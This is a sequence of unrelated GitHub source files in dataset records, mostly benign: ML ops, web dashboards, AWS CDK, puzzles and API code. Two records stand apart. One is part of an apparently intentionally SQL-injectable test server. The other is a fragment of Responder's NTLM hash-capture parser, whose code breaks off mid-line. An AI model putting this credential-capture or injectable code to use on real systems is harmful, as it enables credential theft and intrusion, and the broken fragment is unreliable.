self.dbcursor.fetchall()\r\n self.mydb.commit()\r\n self.sql_dynamic_content[0] = \".\"\r\n self.sql_dynamic_content[1] = result\r\n print(\"Result of execution:\", result)\r\n \r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"sqlinjection.html\"), self.sql_dynamic_content)\r\n \r\n \r\n # Handle unknown objects.\r\n def handle_error(self, msg):\r\n content = self.Error_Page.format(path=self.path, msg=msg).encode(\"utf-8\")\r\n self.send_content(content, 404)\r\n\r\n # Send actual content.\r\n def send_content(self, content, status=200):\r\n self.send_response(status)\r\n self.send_header('Access-Control-Allow-Origin', '*')\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Content-Length\", str(len(content)))\r\n self.end_headers()\r\n self.wfile.write(content)\r\n\r\n # Prepare content to be sent \r\n def 
handle_file(self, full_path, value=[\" .34.s.2 \"]):\r\n try:\r\n with open(full_path, 'rb') as reader:\r\n content = reader.read()\r\n if not \".js\" in self.path:\r\n content = content.decode(\"utf-8\").format(*value)\r\n content = content.replace(\".34.s.2\", \"\")\r\n content = content.encode(\"utf-8\")\r\n self.send_content(content)\r\n except IOError as msg:\r\n msg = \"'{0}' cannot be read: {1}\".format(self.path, msg)\r\n self.handle_error(msg)\r\n \r\n########################################################################################################################################\r\n#Starter\r\n\r\nif __name__ == \"__main__\": \r\n httpd = socketserver.TCPServer((\"\", 8000), serverResponse)\r\n print(\"Server started!\")\r\n print(\"serving at port:\", 8000)\r\n httpd.serve_forever()\r\n \r\n print(\"Server ende\")","repo_name":"SteNu5/ServerBenchmarkTest","sub_path":"ServerBenchmarkTest_Extended/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":9564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27418585489","text":"import math\nimport numpy as np \nimport tensorflow as tf\nimport random\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n\ntry:\n image_summary = tf.compat.v1.summary.image\n scalar_summary = tf.compat.v1.summary.scalar\n histogram_summary = tf.compat.v1.summary.histogram\n merge_summary = tf.compat.v1.summary.merge\n SummaryWriter = tf.compat.v1.summary.FileWriter\nexcept:\n image_summary = tf.compat.v1.summary.image\n scalar_summary = tf.compat.v1.summary.scalar\n histogram_summary = tf.compat.v1.summary.histogram\n merge_summary = tf.compat.v1.summary.merge\n SummaryWriter = tf.compat.v1.summary.FileWriter\n\n# if \"concat_v2\" in dir(tf):\n# def concat(tensors, axis, *args, **kwargs):\n# return tf.concat_v2(tensors, axis, *args, **kwargs)\n# else:\n# def concat(tensors, axis, *args, **kwargs):\n# return tf.concat(tensors, axis, *args, **kwargs)\n\n\ndef conv2d(input_, input_dim,output_dim, \n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"conv2d\"):\n with tf.compat.v1.variable_scope(name):\n\n w = tf.compat.v1.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.compat.v1.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n\n biases = tf.compat.v1.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n return conv,w, biases\n\n \ndef deconv2d(input_, output_shape,\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"deconv2d\", with_w=False):\n with tf.compat.v1.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n w = tf.compat.v1.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.compat.v1.random_normal_initializer(stddev=stddev))\n \n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n # Support for verisons of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n biases = tf.compat.v1.get_variable('biases', [output_shape[-1]], initializer=tf.compat.v1.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n if with_w:\n return deconv, w, biases\n else:\n return deconv, w, biases\n\ndef 
max_pool_2x2(x):\n return tf.nn.max_pool2d(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\n","repo_name":"HWQuantum/HistNet","sub_path":"Codes_network/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"23655727495","text":"import os\nimport dash\nfrom dash import dcc, html, Input, Output, ctx, callback\n\nfrom utils.TEMPERATURA import *\nfrom utils.documentacion.spanish import *\n\nresponsive = True\n\ndash.register_page(\n __name__,\n name='Temperatura',\n path='/Temperatura'\n)\n\n# Data temperatura\ntemperatura = TEMPERATURA()\ntemperatura.get_data()\n\n\n#--\nlayout = html.Div([\n\n dcc.Markdown(\"\"\"\n # El Niño-Oscilación del Sur (ENSO)\n\n El Niño-Oscilación del Sur, es un fenómeno natural caracterizado por la fluctuación de las temperaturas del océano en la parte central y oriental del Pacífico ecuatorial, asociada a cambios en la atmósfera. El ENSO debe su nombre a sus componentes oceánicas (El Niño y La Niña) y atmosférica (Oscilación del Sur) y es uno de los fenómenos climáticos de mayor influencia a nivel global. El mismo, está relacionado con las anomalías interanuales de las precipitaciones que pueden verse reflejadas en largas sequias o fuertes lluvias. Específicamente, en los países andinos el fenómeno de El Niño causa extensas inundaciones en las zonas costeras de Ecuador, del norte del Perú y el oriente de Bolivia. Al mismo tiempo, produce sequías en todo el altiplano boliviano-peruano y déficits de lluvias en Colombia y Venezuela.\n \"\"\"),\n html.Br(),\n html.Br(),\n dcc.Tabs(id=\"tabs-temp\", value='tab-sst', \n children=[dcc.Tab(label='SST', value='tab-sst'),\n dcc.Tab(label='Anomalías de SST', value='tab-anomalias'),\n dcc.Tab(label='ONI', value='tab-oni')\n ]),\n\n html.Div([html.Div(id='out-tab-temp')],className='out__tab__temp')\n])\n\n\n@callback(\n Output('out-tab-temp', 'children'),\n Input('tabs-temp', 'value')\n)\ndef displayClick(tabs_temp):\n\n height=600\n width=900\n\n\n if tabs_temp == 'tab-sst':\n\n graph = temperatura.temperatura_sst(serie='nino34_mean', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_sst),\n dcc.Graph(id=\"graph_sst\", figure=graph,responsive=responsive,className='graph__sst'),\n html.Br(),\n html.Br()\n ]\n\n elif tabs_temp == 'tab-anomalias':\n\n graph = temperatura.temperatura_sst(serie='anomalias', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_anomalias),\n html.Div([\n dcc.Graph(id=\"graph_anomalias\",\n figure=graph,\n responsive=True)\n ],\n className='graph__anomalias'),\n html.Br(),\n html.Br()\n ]\n\n elif tabs_temp == 'tab-oni':\n graph = temperatura.temperatura_oni(height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_oni),\n dcc.Graph(id=\"graph_oni\", figure=graph,responsive=responsive,className='graph__oni'),\n html.Br(),\n html.Br()\n ]\n \n else:\n graph = temperatura.temperatura_sst(serie='nino34_mean', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(\"\"\"ERROR\"\"\"),\n html.Br(),\n dcc.Graph(id=\"example-graph\", figure=graph,responsive=responsive),\n html.Br(),\n dcc.Markdown(\"\"\"ERROR\"\"\")\n ]\n","repo_name":"esglobe/seev-dash","sub_path":"app_ssev/pages/temperatura.py","file_name":"temperatura.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"14151919834","text":"# compute_stack.py\nfrom aws_cdk import Stack, aws_lambda, aws_iam, aws_secretsmanager, aws_dynamodb, CfnOutput\n\n\nfrom constructs import Construct\n\nclass AwsServerlessChatbotBackendStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n \n\n # IAM role for Lambda functions\n lambda_role = aws_iam.Role(\n self, \"LambdaExecutionRole\",\n assumed_by=aws_iam.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"AmazonDynamoDBFullAccess\")\n ]\n )\n\n # Add inline policy to the lambda_role for accessing the secret\n secret_arn = \"arn:aws:secretsmanager:us-east-2:868658902285:secret:prod/chatbot/secrectname-xPgLfu\" # Replace with your actual secret ARN\n lambda_role.add_to_policy(aws_iam.PolicyStatement(\n actions=[\"secretsmanager:GetSecretValue\"],\n resources=[secret_arn]\n ))\n\n # DynamoDB Table with On-Demand capacity\n context_table = aws_dynamodb.Table(\n self, \"chBotContextTable\",\n partition_key=aws_dynamodb.Attribute(name=\"user_id\", type=aws_dynamodb.AttributeType.STRING),\n billing_mode=aws_dynamodb.BillingMode.PAY_PER_REQUEST\n )\n\n\n # Layer for Lambda\n lambda_layer = aws_lambda.LayerVersion(\n self, \"MyChBotLayer\",\n code=aws_lambda.Code.from_asset(\"lib_layer\"),\n compatible_runtimes=[aws_lambda.Runtime.PYTHON_3_11],\n description=\"A layer for shared libraries\"\n )\n\n\n # Lambda function\n lambda_function_1 = aws_lambda.Function(\n self, \"chBotBackEndLambda\",\n runtime=aws_lambda.Runtime.PYTHON_3_11,\n handler=\"index.handler\",\n code=aws_lambda.Code.from_asset(\"lambda_backend\"),\n environment={\n \"TABLE_NAME\": context_table.table_name\n },\n role=lambda_role,\n layers=[lambda_layer]\n )\n\n # Grant Lambda function access to the DynamoDB table\n context_table.grant_full_access(lambda_function_1)\n\n # Outputs\n CfnOutput(self, \"LambdaFunctionName\", value=lambda_function_1.function_name)\n CfnOutput(self, \"DynamoDBTableName\", value=context_table.table_name)\n","repo_name":"amitraikkr/aws-serverless-chatbot-backend","sub_path":"aws_serverless_chatbot_backend/aws_serverless_chatbot_backend_stack.py","file_name":"aws_serverless_chatbot_backend_stack.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393032232","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\ndice = [list(map(int, input().split())) for _ in range(n)]\nidx = [5,3,4,1,2,0]\n\ndef find(i):\n ret = 0\n if i == 6:\n return 0\n if i == 0 or i == 5:\n ret += max(dice[0][1:5])\n elif i == 1 or i == 3:\n ret += max(dice[0][0], dice[0][2], dice[0][4], dice[0][5])\n elif i == 2 or i == 4:\n ret += max(dice[0][0], dice[0][1], dice[0][3], dice[0][5])\n prev = dice[0][idx[i]]\n for j in range(n-1):\n j_idx = dice[j + 1].index(prev)\n if j_idx == 0 or j_idx == 5:\n ret += max(dice[j+1][1:5])\n elif j_idx == 1 or j_idx == 3:\n ret += max(dice[j+1][0], dice[j+1][2], dice[j+1][4], dice[j+1][5])\n elif j_idx == 2 or j_idx == 4:\n ret += max(dice[j+1][0], dice[j+1][1], dice[j+1][3], dice[j+1][5])\n prev = dice[j+1][idx[j_idx]]\n\n ret = max(ret, find(i+1))\n return ret\n\nprint(find(0))","repo_name":"112224/algorithm","sub_path":"python3/2116 주사위 쌓기.py","file_name":"2116 주사위 
쌓기.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12536367621","text":"from datetime import datetime\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytest\nfrom rdp import rdp\n\nfrom brevet_top_plot_a_route import (\n ROUTE_SIMPLIFY_FACTOR,\n)\nfrom brevet_top_strava import (\n cut_off_prolog,\n cut_off_epilog,\n np_align_track_to_route,\n TRACK_SIMPLIFY_FACTOR,\n)\n\n\n@pytest.mark.parametrize(\n (\"track_name\", \"expected\", \"length\"),\n [\n (\"jogging.gpx\", -211.33, (39, 7, 7)),\n (\"jogging-2.gpx\", -722.519, (220, 7, 7)),\n (\"jogging-3.gpx\", -624.105, (307, 7, 7)),\n (\"jogging-5.gpx\", -497.027, (265, 7, 7)),\n ],\n)\ndef x_test_gpx_route(\n track_name: str,\n expected: float,\n length: Tuple[int, int, int],\n gpx_route: List[Tuple[float, float, float, float]],\n gpx_track: List[Tuple[float, float, float, float]],\n gpx_waypoints: List[Tuple[float, float, int]],\n):\n route = np.array(gpx_route)\n route_mask = rdp(route[:, :2], ROUTE_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n draft = np.array(gpx_track)\n track = cut_off_prolog(cut_off_epilog(draft, route[-1]), route[0])\n track_mask = rdp(track[:, :3], TRACK_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n\n cost, reduced = np_align_track_to_route(route[route_mask], track[track_mask])\n\n plt.plot(route[route_mask].T[1], route[route_mask].T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\"o\")\n plt.plot(track[track_mask].T[1], track[track_mask].T[0], marker=\"+\")\n plt.plot(track.T[1], track.T[0], marker=\".\")\n # plt.show()\n\n assert round(cost, 3) == expected\n assert (len(track), len(route[route_mask]), len(reduced)) == length\n\n\n@pytest.mark.parametrize(\n (\"track_name\", \"expected\", \"length\"),\n [\n (\"jogging.gpx\", -870.924, (39, 6, 6)),\n (\"jogging-2.gpx\", -867.415, (598, 6, 6)),\n (\"jogging-3.gpx\", -484.468, (684, 6, 6)),\n (\"jogging-5.gpx\", -1157.605, (651, 6, 6)),\n ],\n)\ndef x_test_gpx_checkpoints(\n track_name: str,\n expected: float,\n length: Tuple[int, int, int],\n gpx_route: List[Tuple[float, float, float, float]],\n gpx_track: List[Tuple[float, float, float, float]],\n gpx_waypoints: List[Tuple[float, float, int]],\n get_checkpoints: List[Tuple[float, float, float, float]],\n):\n checkpoints = np.array(get_checkpoints)\n\n draft = np.array(gpx_track)\n track = cut_off_prolog(\n cut_off_epilog(draft, get_checkpoints[-1]), get_checkpoints[0]\n )\n track_mask = rdp(track[:, :3], TRACK_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n\n cost, reduced = np_align_track_to_route(checkpoints, track[track_mask])\n\n plt.plot(checkpoints.T[1], checkpoints.T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\"o\")\n plt.plot(track.T[1], track.T[0], marker=\".\")\n # plt.show()\n # assert False\n\n for i, cp in enumerate(reduced):\n # test for NaN\n if cp[3] == cp[3]:\n print(f\"control {i}. 
{cp[0:2]} {cp[3]} {datetime.fromtimestamp(cp[2])}\")\n\n assert round(cost, 3) == expected\n assert (len(draft), len(checkpoints), len(reduced)) == length\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_strava/tests/test_np_gpx_jogging.py","file_name":"test_np_gpx_jogging.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23286481777","text":"\"\"\"virtualmagiciansapi URL Configuration\"\"\"\nfrom django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom virtualmagicians.views import register_user, login_user, Customers, Products, Users, PaymentTypes, ProductTypes, Orders, OrderProducts\n\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r'customers', Customers, 'customer')\nrouter.register(r'products', Products, 'product')\nrouter.register(r'users', Users, 'user')\nrouter.register(r'orders', Orders, 'order')\nrouter.register(r'order_products', OrderProducts, 'orderproduct')\nrouter.register(r'payment_types', PaymentTypes, 'payment_type')\nrouter.register(r'product_types', ProductTypes, 'product_type')\n\nurlpatterns = [\n path('', include(router.urls)),\n path('register/', register_user),\n path('login/', login_user),\n path('api-token-auth/', obtain_auth_token),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n]","repo_name":"nss-cohort-36/bangazon-api-virtual_magicians","sub_path":"virtualmagiciansapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17654108758","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport string\nimport sys\n\ndef words_pythonest(text,n):\n words=[]\n c=\"\"\n j=0\n while text[j].isspace():\n j+=1\n for i in range(j,len(text)):\n if text[i].isalpha():\n c+=text[i]\n if i==len(text)-1:\n words.append(c)\n else:\n if (text[i].isspace() and text[i-1].isalpha()) or (text[i] in string.punctuation):\n words.append(c)\n c=\"\"\n words_sorted=[]\n for i in words:\n if len(i)>n:\n words_sorted.append(i)\n return words_sorted\n \nif __name__=='__main__':\n if len(sys.argv)>3:\n print(\"Too many arguments\")\n elif len(sys.argv)<3:\n print(\"Few arguments\")\n else:\n if sys.argv[1].isdigit():\n print(\"ERROR\")\n else:\n if sys.argv[2].isdigit():\n print(words_pythonest(sys.argv[1],int(sys.argv[2])))\n else:\n print(\"ERROR\")","repo_name":"AyoubDaoudia/bootcamp_python_codes","sub_path":"day00/ex07/filterwords.py","file_name":"filterwords.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16646095820","text":"# 23/03/27\n# https://leetcode.cn/problems/next-greater-element-ii/\n\nfrom collections import List \n\ndef nextGreaterElements(nums: List[int]) -> List[int]:\n\n lengthOfNums = len(nums)\n stack = list()\n result = [-1 for _ in range(lengthOfNums)]\n\n for i in range(lengthOfNums * 2):\n index = i % lengthOfNums\n while stack and nums[index] > nums[stack[-1]]:\n result[stack[-1]] = nums[index]\n stack.pop()\n stack.append(index)\n \n return result","repo_name":"Syueying/LeetCodeDaily","sub_path":"单调栈/3. 
下一个更大元素 II - 503/Next Greater Element II.py","file_name":"Next Greater Element II.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13708505440","text":"#!/usr/bin/env python\n# This file is part of Responder, a network take-over set of tools \n# created and maintained by Laurent Gaffie.\n# email: laurent.gaffie@gmail.com\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\nimport struct\nimport codecs\nfrom responder.utils import *\n\nif settings.Config.PY2OR3 == \"PY3\":\n from socketserver import BaseRequestHandler, StreamRequestHandler\nelse:\n from SocketServer import BaseRequestHandler, StreamRequestHandler\nfrom base64 import b64decode, b64encode\nfrom responder.packets import NTLM_Challenge\nfrom responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans, \\\n WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans\nfrom responder.packets import WPADScript, ServeExeFile, ServeHtmlFile\n\n\n# Parse NTLMv1/v2 hash.\ndef ParseHTTPHash(data, Challenge, client, module, tool_q=None):\n LMhashLen = struct.unpack(' 24:\n NthashLen = 64\n DomainLen = struct.unpack(' List[str]:\n ans = []\n dic = {2:[\"a\",\"b\",\"c\"], 3:[\"d\",\"e\",\"f\"], 4:[\"g\",\"h\",\"i\"],\n 5:[\"j\",\"k\",\"l\"],6:[\"m\",\"n\",\"o\"],7:[\"p\",\"q\",\"r\",\"s\"],\n 8:[\"t\",\"u\",\"v\"],9:[\"w\",\"x\",\"y\",\"z\"]}\n for i in range(len(digits)):\n if ans:\n ans = self.multi(ans,dic[int(digits[i])] )\n else:\n ans = dic[int(digits[i])]\n return ans\n \n \n\n def multi(self, l1 , l2):\n ans = []\n for i in range(len(l1)):\n for j in range(len(l2)):\n ans.append((l1[i]+l2[j]))\n return ans\n","repo_name":"mhrezaiek/Algorithm-Problems","sub_path":"letterCombinations.py","file_name":"letterCombinations.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25671503030","text":"import os\nimport flask\n\nfrom src import factory_build_app\nfrom src.service.DatacubeIndexesService import DatacubeIndexesService\n\napp = factory_build_app(os.getenv('BOILERPLATE_ENV') or 'dev')\n\nHTTP_HOST = os.getenv('HTTP_HOST', '127.0.0.1')\nHTTP_PORT = int(os.getenv('HTTP_PORT', '5001'))\n\n\n@app.route('/', methods=['POST'])\ndef pull_economic_indexes_local():\n return pull_economic_indexes(flask.request)\n\n\ndef pull_economic_indexes(request):\n \"\"\"\n Pull SpaceKnow economic products from the Product API.\n\n expected request format:\n {\n authentiactionToken: \"\",\n products: [productId]\n }\n\n :return: Dict with success status.\n \"\"\"\n datacube_index_service = DatacubeIndexesService(request.json.get('authenticationToken'))\n index_catalog = datacube_index_service.get_indexes_by_product_id()\n\n if index_catalog == {} or 'error' in index_catalog:\n status = 'failed'\n else:\n status = 'success'\n\n return {\n 'status': status,\n 'results': 
index_catalog\n    }\n\n\ndef handle_http_event(request):\n    """Responds to any HTTP request.\n    Args:\n        request (flask.Request): HTTP request object.\n    Returns:\n        The response text or any set of values that can be turned into a\n        Response object using\n        `make_response `.\n    """\n    return pull_economic_indexes(request)\n\n\nif __name__ == '__main__':\n    app.run(host=HTTP_HOST, port=HTTP_PORT)\n","repo_name":"drabekj/datacube-indexes-microservice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18238247731","text":"\"\"\"\nLicense Plate Models.\n\"\"\"\n\nfrom datetime import datetime\nfrom db import db\n\n\nclass LicensePlateModel(db.Model):\n    \"\"\"\n    Models definition.\n    \"\"\"\n\n    __tablename__ = 'license_plate'\n\n    id = db.Column(\n        db.Integer,\n        primary_key=True,\n    )\n    plate = db.Column(\n        db.String(10),\n        nullable=False,\n        unique=True,\n    )\n    timestamp = db.Column(\n        db.String(20),\n        nullable=True,\n    )\n\n    def __init__(self, plate) -> None:\n        self.plate = plate\n        self.timestamp = datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n    def __repr__(self) -> str:\n        return f'LicensePlateModel(plate={self.plate},\\\n            timestamp={self.timestamp})'\n\n    def json(self, ):\n        return{\n            'plate': self.plate,\n            'timestamp': self.timestamp,\n        }\n\n    @classmethod\n    def find_all(cls: object) -> object:\n        \"\"\"\n        Query to retrieve all data from database.\n\n        :return: All data as class objects.\n        \"\"\"\n\n        return cls.query.all()\n\n    def save_to_db(self, ):\n        \"\"\"\n        Data base commit.\n        \"\"\"\n\n        db.session.add(self)\n        db.session.commit()\n","repo_name":"LucasAlbFar/license_plate_repo","sub_path":"src/models/license_plate.py","file_name":"license_plate.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35587703822","text":"import random\nimport time\n\n\ndef random_int_list(start, stop, length):\n    start, stop = (int(start), int(stop)) if start <= stop else (\n        int(stop), int(start))\n    length = int(abs(length)) if length else 0\n    random_list = []\n    for i in range(length):\n        random_list.append(random.randint(start, stop))\n    return random_list\n\n\ndef INSERTION_SORT(list, p, r):\n    for n in range(p + 1, r):\n        tmp = list[n]\n        i = n - 1\n        while i >= p and list[i] > tmp:\n            list[i + 1] = list[i]\n            i = i - 1\n        list[i + 1] = tmp\n\n\ndef MERGE(list, p, q, r, k):\n    L = list[p:q]\n    R = list[q:r]\n    i = j = 0\n    while i < len(L) and j < len(R):\n        if L[i] <= R[j]:\n            list[p] = L[i]\n            i += 1\n        else:\n            list[p] = R[j]\n            j += 1\n        p += 1\n    if i > j:\n        for j in range(j, len(R)):\n            list[p] = R[j]\n            p += 1\n    else:\n        for i in range(i, len(L)):\n            list[p] = L[i]\n            p += 1\n\n\ndef MERGE_SORT(list, p, r, k):\n    if len(list[p:r]) < k:\n        INSERTION_SORT(list, p, r)\n    elif p < r - 1:\n        q = int((r - p) / 2 + p)\n        MERGE_SORT(list, p, q, k)\n        MERGE_SORT(list, q, r, k)\n        MERGE(list, p, q, r, k)\n\n\nA = random_int_list(1, 10000, 1000)\n\nstart = time.perf_counter()\nMERGE_SORT(A, 0, len(A), 20)\nend = time.perf_counter()\nprint(\"K=20 : %f s\" % (end - start))\n\nB = [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]\nstart = time.perf_counter()\nMERGE_SORT(A, 0, len(A), 0)\nend = time.perf_counter()\nprint(\"K= 0 : %f s\" % (end - 
start))\n","repo_name":"mixterjim/Learn","sub_path":"Python/CLRS/2-1_Merge-Insertion-Sort.py","file_name":"2-1_Merge-Insertion-Sort.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21302819285","text":"\"\"\"Punto de entrada\"\"\"\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.api.api import api_router\n\napp = FastAPI(\n title=\"LaFedeAPI\",\n summary='LA FEDE API: obtén información sobre 2ª Autonómica Masculina.',\n description=\"\"\"\n ## EndPoints\n\n * Resultados de temporadas anteriores\n * Información sobre los equipos por temporada\n * **Calendarios de temporadas anteriores** (_not implemented_).\n \"\"\",\n version=\"0.0.1\",\n contact={\n \"name\": \"Valentín Lorente Jiménez\",\n \"url\": \"https://github.com/vLorente\",\n \"email\": \"vlorentejimenez@gmail.com\",\n },\n)\n\n# Configuración de CORS\norigins = [\n \"http://localhost\",\n \"http://localhost:8000\",\n]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(api_router)\n","repo_name":"vLorente/la-fede-teams-analytics","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19049599971","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom typing import Tuple\n\nfrom fastapi import Depends, HTTPException, status\n\nfrom models.user import User\nfrom utils.auth import get_current_active_user\nfrom utils.cache import BaseCache, CacheMixin\n\n\nclass MeteringCache(BaseCache, CacheMixin):\n CACHE_NAME = \"metering\"\n\n def _generate_usage_key_per_second(self, api_key: str) -> str:\n return self._generate_key(api_key, datetime.utcnow().strftime(\"%Y%m%d-%H%M%S\"))\n\n def _generate_usage_key_per_minute(self, api_key: str) -> str:\n return self._generate_key(api_key, datetime.utcnow().strftime(\"%Y%m%d-%H%M\"))\n\n def increment_api_usage(self, api_key: str) -> dict:\n usage_per_second = self._incr_value(self._generate_usage_key_per_second(api_key))\n usage_per_minute = self._incr_value(self._generate_usage_key_per_minute(api_key))\n return {\n \"per_second\": usage_per_second,\n \"per_minute\": usage_per_minute,\n }\n\n def get_api_usage(self, api_key: str) -> dict:\n usage_per_second = int(self._get_value(self._generate_usage_key_per_second(api_key)) or 0)\n usage_per_minute = int(self._get_value(self._generate_usage_key_per_minute(api_key)) or 0)\n return {\n \"per_second\": usage_per_second,\n \"per_minute\": usage_per_minute,\n }\n\n\ndef get_api_usage(\n current_user_with_token: Tuple[User, str, str] = Depends(get_current_active_user)\n) -> Tuple[User, str, dict]:\n from settings.active import ( # pylint:disable=import-outside-toplevel\n RATE_THROTTLING_PER_MINUTE,\n RATE_THROTTLING_PER_SECOND,\n )\n\n current_user, token, _type = current_user_with_token\n usage = MeteringCache().get_api_usage(token)\n if usage[\"per_second\"] >= RATE_THROTTLING_PER_SECOND:\n raise HTTPException(status_code=status.HTTP_429_TOO_MANY_REQUESTS, detail=\"Throttling per second\")\n if usage[\"per_minute\"] >= RATE_THROTTLING_PER_MINUTE:\n raise HTTPException(status_code=status.HTTP_429_TOO_MANY_REQUESTS, detail=\"Throttling per minute\")\n return current_user, _type, 
MeteringCache().increment_api_usage(token)\n","repo_name":"cristhianclx/logs","sub_path":"app/utils/metering.py","file_name":"metering.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245888377","text":"\"\"\"Dia meter of a binary tree.\"\"\"\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.left = None\n self.right = None\n\n def find_max(self, node, maxi: list[int]) -> int:\n if node is None:\n return 0\n\n lh: int = self.find_max(node.left, maxi)\n rh: int = self.find_max(node.right, maxi)\n\n maxi[0] = max(maxi[0], lh + rh)\n\n return 1 + max(lh, rh)\n\n def diameter_of_bt(self, maxi: list[int]) -> int:\n self.find_max(self, maxi)\n return maxi[0]\n\n\ndef build_tree():\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n\n root.left.left = Node(4)\n root.left.right = Node(5)\n\n root.left.right.left = Node(6)\n root.left.right.right = Node(7)\n\n return root\n\n\nif __name__ == \"__main__\":\n root = build_tree()\n # print(root.max_height(root))\n maxi: list[int] = [0]\n 